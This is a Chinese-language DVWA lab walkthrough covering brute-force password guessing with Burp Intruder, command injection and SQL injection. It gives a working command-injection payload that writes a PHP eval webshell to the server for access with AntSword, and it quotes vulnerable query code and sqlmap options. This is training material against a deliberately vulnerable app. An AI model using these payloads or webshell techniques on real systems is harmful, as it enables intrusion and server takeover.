DVWA通关文档
开始前
❗❗一定给自己的虚拟机拍摄一个快照,便于还原初始状态❗❗
⭐准备工具
burpsite(当然简单的请求可以用python写脚本自己跑)
中国蚁剑antsword
LOW security
Brute Force 蛮力法暴力破解
在内嵌浏览器中拦截该次请求并发送到intruder爆破器,修改payload并进行爆破密码
添加payload位置,在payload中加入字典,常用密码字典自己找找
常用密码字典跑出来按长度排序发现长度不一样的就是正确密码
Command Injection
前置知识:
ping,php,linux命令,连接符|,||,&,&&
查看源码,windows系统ping四次自己结束
linux系统不会自动结束因此加上4次限制
直接执行shell exec里面的命令拼接
验证存在命令执行漏洞可以直接执行
键入127.0.0.1&pwd查看当前路径
创建一个shell
127.0.0.1&echo -e "<?php @eval(\$_POST['test']);?>" > 555.php
会创建一个内容为
<?php @eval(\$_POST['test']);?>
的555.php,这是我们留下的后门木马
127.0.0.1|ls
我们已经留下了555.php木马后门,用antsword添加数据获取shell
现在已经获得了完整的权限
用完记得删 555.php
SQL injection
// Check database
$query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
$result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
sqlmap
kali系统自带
-u //目的地址
--dbs // 列举数据库
--cookie //设置cookie